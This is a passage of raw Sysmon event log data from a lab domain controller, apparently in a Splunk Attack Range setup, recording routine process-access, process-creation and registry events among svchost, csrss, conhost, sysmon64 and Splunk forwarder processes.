AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:43:15.566{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0xdf4888eb) 10341000x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:44.690{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.690{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:44.691{59A5CD1D-9090-6005-1C01-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.534{59A5CD1D-9091-6005-1D01-00000000A301}30884732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.393{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 